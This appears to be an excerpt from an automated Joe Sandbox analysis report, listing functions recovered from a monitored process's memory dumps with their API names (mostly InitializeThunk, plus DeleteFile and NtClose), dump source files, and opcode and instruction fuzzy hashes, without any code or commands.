                                                            • Instruction Fuzzy Hash: AF212BB5A00209AFDB10DF98DC41EEF77B9EF88714F104109FD19A7240E774A9518BA5
                                                            Function 00519260 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeleteFile
                                                            • String ID:
                                                            • API String ID: 4033686569-0
                                                            • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                            • Instruction ID: 0a079ea707a715a7f105175c1355eb17bfb4463cb116c5239a7a068102db7dda
                                                            • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                            • Instruction Fuzzy Hash: 4B11A371900209BAE620EBA4CC06FEB77ACEFC9714F104149FA08A7281E775794587A5
                                                            Function 00519300 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00519334
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_4f0000_fc.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction ID: 758a29886609891560d14e2aeee11a7680426056d5fd5afdc4c05d62e70b464c
                                                            • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                            • Instruction Fuzzy Hash: 75E04F32205204BBE610AA59DC01FDB775DDBC5764F014419FA0CA7141D675B91186F5
                                                            Function 02E04340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f4ce9715790590b55bce61dbc8248423c98f1b7f3be9225e790684fd30fa9e88
                                                            • Instruction ID: 29b88fdb4d5e7accc51dd4bd0db0e45b1ebc76fc3a43c90abf742b7f2b5152a1
                                                            • Opcode Fuzzy Hash: f4ce9715790590b55bce61dbc8248423c98f1b7f3be9225e790684fd30fa9e88
                                                            • Instruction Fuzzy Hash: 3290023168580013A580B1584885547500597E1301B95D021E0424558C8B148A569361
                                                            Function 02E04650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 23d599e8276832c21caad28a192ef0cf4341ce556458e26c33ab37dc775f358b
                                                            • Instruction ID: da981791447e882cbd3237083ad9a560dd015de4b7a9e0743c904776c0f3d07b
                                                            • Opcode Fuzzy Hash: 23d599e8276832c21caad28a192ef0cf4341ce556458e26c33ab37dc775f358b
                                                            • Instruction Fuzzy Hash: 22900271681500435580B1584805407700597E23013D5D125A0554564C87188955D269
                                                            Function 02E02AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1a21326c0debe85a227f8ec8bae8236f62fa6be96d3b7050fa4057be0d2baf4a
                                                            • Instruction ID: c752737970b4007845c8dbe9528dca01a0d1ccbd44b911b67fdc349574dec21d
                                                            • Opcode Fuzzy Hash: 1a21326c0debe85a227f8ec8bae8236f62fa6be96d3b7050fa4057be0d2baf4a
                                                            • Instruction Fuzzy Hash: CA9002352A1400031585F558060550B144597D73513D5D025F1416594CC72189659321
                                                            Function 02E02AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3bf0a9fb1e52458e01fb0a7a88385e754f67ce539ebdd43d482a618d619ebc24
                                                            • Instruction ID: 9dcad566afe8711857a94c976f5d0fd53fbfc7da1448e5629cc0b4e81bc7f545
                                                            • Opcode Fuzzy Hash: 3bf0a9fb1e52458e01fb0a7a88385e754f67ce539ebdd43d482a618d619ebc24
                                                            • Instruction Fuzzy Hash: A29004353D1400031545F55C07055071047C7D73513D5D031F1015554CD731CD71D131
                                                            Function 02E02BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f7dc650f459995941f84944ba8c64a0843a47e760b44b13b2920b19d8b76c6a0
                                                            • Instruction ID: 3f656014b2bf1a8d3fbd2df7eaa0699bc9d4c1f805281c9dbf08b330b02dc27d
                                                            • Opcode Fuzzy Hash: f7dc650f459995941f84944ba8c64a0843a47e760b44b13b2920b19d8b76c6a0
                                                            • Instruction Fuzzy Hash: E990023128544843E580B1584405A47101587D1305F95D021A0064698D97258E55F661
                                                            Function 02E02BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e9d3c07b704c32d9ad0e4fd561d2bb499bad6588abefabc157da811baab8d489
                                                            • Instruction ID: e56446ee7718add1c2296e98ebdd6be7aba603f7dcea9645de134f1b8dd65c61
                                                            • Opcode Fuzzy Hash: e9d3c07b704c32d9ad0e4fd561d2bb499bad6588abefabc157da811baab8d489
                                                            • Instruction Fuzzy Hash: 0B90023128140803E5C0B158440564B100587D2301FD5D025A0025658DCB158B59B7A1
                                                            Function 02E02BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a090bcbf051e79391ae71b891a02e68a559b6787507e4476a7162fcf71e7393b
                                                            • Instruction ID: 307dfe35a012506b4bca1294f5ee3a35a9c433af0986a6a8dcb8035e79bc0f2c
                                                            • Opcode Fuzzy Hash: a090bcbf051e79391ae71b891a02e68a559b6787507e4476a7162fcf71e7393b
                                                            • Instruction Fuzzy Hash: 8A90023168540803E590B1584415747100587D1301F95D021A0024658D87558B55B6A1
                                                            Function 02E02B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: afec81a2cd86986f0a3dd8fc96f97c7394d6e3981f53355c80e0cb00235d935f
                                                            • Instruction ID: 2dfd1031a598cf7885b76228005bbd6442696b044a72399fa279b4630a269a68
                                                            • Opcode Fuzzy Hash: afec81a2cd86986f0a3dd8fc96f97c7394d6e3981f53355c80e0cb00235d935f
                                                            • Instruction Fuzzy Hash: FA900271282400035545B1584415617500A87E1201B95D031E1014594DC6258991A125
                                                            Function 02E02EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 007fc7e699d1db875f5a3f886c05a06bc03585e4cc67c0e8d7c743a4827144a1
                                                            • Instruction ID: bf474a1a20493ed17ca20a4baf6824e36719c6a0953c27d7cdf7f83c25b7e162
                                                            • Opcode Fuzzy Hash: 007fc7e699d1db875f5a3f886c05a06bc03585e4cc67c0e8d7c743a4827144a1
                                                            • Instruction Fuzzy Hash: AD90027128180403E580B5584805607100587D1302F95D021A2064559E8B298D51A135
                                                            Function 02E02E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e41b53a0e4598fcc00d95c9092aafe073244fa7a1615c12229cf47c46da59851
                                                            • Instruction ID: bf6304f6226867a43687e0c828aec7b096eecb57a73966dfbb96cccbdf2c4ba4
                                                            • Opcode Fuzzy Hash: e41b53a0e4598fcc00d95c9092aafe073244fa7a1615c12229cf47c46da59851
                                                            • Instruction Fuzzy Hash: C890023168140503E541B1584405617100A87D1241FD5D032A1024559ECB258A92E131
                                                            Function 02E02FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 72adc2e1a6b94e1cf9eb37d215e46c6660b7825fd292d93b6bfb73709995c3b7
                                                            • Instruction ID: 9a071464ca5eec8523058d935db4ef11a1fd18eff70f3df316a273c1ef32e471
                                                            • Opcode Fuzzy Hash: 72adc2e1a6b94e1cf9eb37d215e46c6660b7825fd292d93b6bfb73709995c3b7
                                                            • Instruction Fuzzy Hash: A8900231291C0043E640B5684C15B07100587D1303F95D125A0154558CCA1589619521
                                                            Function 02E02FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c98085fded638c1ee2401e94b82bd93bd5a71ee26b24fc817607a8c2c5d15dcf
                                                            • Instruction ID: 9273265853d65d3bd5416334db5c7832da79a8a7b32aa219321a7fcdb7781556
                                                            • Opcode Fuzzy Hash: c98085fded638c1ee2401e94b82bd93bd5a71ee26b24fc817607a8c2c5d15dcf
                                                            • Instruction Fuzzy Hash: 9B900231681400435580B16888459075005ABE2211795D131A0998554D865989659665
                                                            Function 02E02F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ce7b0fdfe78dbaf2c13b896885ed3d602c25a7daa7394ab5ff69f11680fb6fe2
                                                            • Instruction ID: 29aa723355dd44300cfb42196a06c02f314b04b8de818b2f7c7c60b68da849bb
                                                            • Opcode Fuzzy Hash: ce7b0fdfe78dbaf2c13b896885ed3d602c25a7daa7394ab5ff69f11680fb6fe2
                                                            • Instruction Fuzzy Hash: CA9002713C140443E540B1584415B071005C7E2301F95D025E1064558D8719CD52A126
                                                            Function 02E02CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: df66db05cc5cd99005e2afd77452c95b1dfe84d2e505da563b5022ada411d263
                                                            • Instruction ID: c925a92eff9082da9993ee96f92d4c612b69241834b85d52f994c874f17d85ea
                                                            • Opcode Fuzzy Hash: df66db05cc5cd99005e2afd77452c95b1dfe84d2e505da563b5022ada411d263
                                                            • Instruction Fuzzy Hash: 1390023128140403E540B5985409647100587E1301F95E021A5024559EC7658991A131
                                                            Function 02E02C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 8e89c7b4e71f4f414100ffe258ba205663eef96fc35bdd34ce24742fe9381e98
                                                            • Instruction ID: 97adb01a4ec771d2423cc14d0d6f4fecf227eb4e564f4bfb4a52f81bdcdee77d
                                                            • Opcode Fuzzy Hash: 8e89c7b4e71f4f414100ffe258ba205663eef96fc35bdd34ce24742fe9381e98
                                                            • Instruction Fuzzy Hash: A090023128140843E540B1584405B47100587E1301F95D026A0124658D8715C951B521
                                                            Function 02E02C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4d2e79e81c06b69a2a51e0d6936ff8cfa45b06024b885a8f0a9e8a09e3e2e0e8
                                                            • Instruction ID: 190890252d9fb453ed09203d234ec254574a775ec8b981350853266a027df9d0
                                                            • Opcode Fuzzy Hash: 4d2e79e81c06b69a2a51e0d6936ff8cfa45b06024b885a8f0a9e8a09e3e2e0e8
                                                            • Instruction Fuzzy Hash: 9690023128148803E550B158840574B100587D1301F99D421A442465CD87958991B121
                                                            Function 02E02DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c1740f22167501da2ff574a78e504326b7d3a1e16ce0909205a9333e11ab2087
                                                            • Instruction ID: d93497a2c5cdfb1d876623ec509b9756267dac029dc8870a335e9e7b320a6b5e
                                                            • Opcode Fuzzy Hash: c1740f22167501da2ff574a78e504326b7d3a1e16ce0909205a9333e11ab2087
                                                            • Instruction Fuzzy Hash: 4C90023128140413E551B1584505707100987D1241FD5D422A042455CD97568A52E121
                                                            Function 02E02DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 50eb7ed803c21a606c9f3aa696a61f7bb83b59904245fcaae550a7260af7d7c0
                                                            • Instruction ID: 0d3903d2ef1e7a563f05eeccc84586aa3fba78d423ed093dc3fd52850ee35f71
                                                            • Opcode Fuzzy Hash: 50eb7ed803c21a606c9f3aa696a61f7bb83b59904245fcaae550a7260af7d7c0
                                                            • Instruction Fuzzy Hash: 139002312C2441536985F1584405507500697E12417D5D022A1414954C86269956D621
                                                            Function 02E02D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ee38275e7166ab3f60ce413d612bd7a95f9933e86d59fd06ad825730127bcf41
                                                            • Instruction ID: ee07919acbbf028855303ad935355be5469b7d196ee031fe79d5922137053769
                                                            • Opcode Fuzzy Hash: ee38275e7166ab3f60ce413d612bd7a95f9933e86d59fd06ad825730127bcf41
                                                            • Instruction Fuzzy Hash: F690023138140003E580B15854196075005D7E2301F95E021E0414558CDA1589569222
                                                            Function 02E02D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c515a385c38e9fa903d1ebc51c8236bfd56df4ad6001d8687972a5a1d440834a
                                                            • Instruction ID: e1a337d597f6d1aa36a5d00f2c1efd068fa937134f53125fc440258f4bcfdfa4
                                                            • Opcode Fuzzy Hash: c515a385c38e9fa903d1ebc51c8236bfd56df4ad6001d8687972a5a1d440834a
                                                            • Instruction Fuzzy Hash: E390023929340003E5C0B158540960B100587D2202FD5E425A001555CCCA1589699321
                                                            Function 02E035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 73940f2d8f798249324c96a55f01333e054bc0eb39f8c2842692ff73e2f6258b
                                                            • Instruction ID: ddd0052e55645d464ca28523edb1d2c9a4579bfc3050023752e3e3e231adf380
                                                            • Opcode Fuzzy Hash: 73940f2d8f798249324c96a55f01333e054bc0eb39f8c2842692ff73e2f6258b
                                                            • Instruction Fuzzy Hash: 4490023168550403E540B1584515707200587D1201FA5D421A042456CD87958A51A5A2
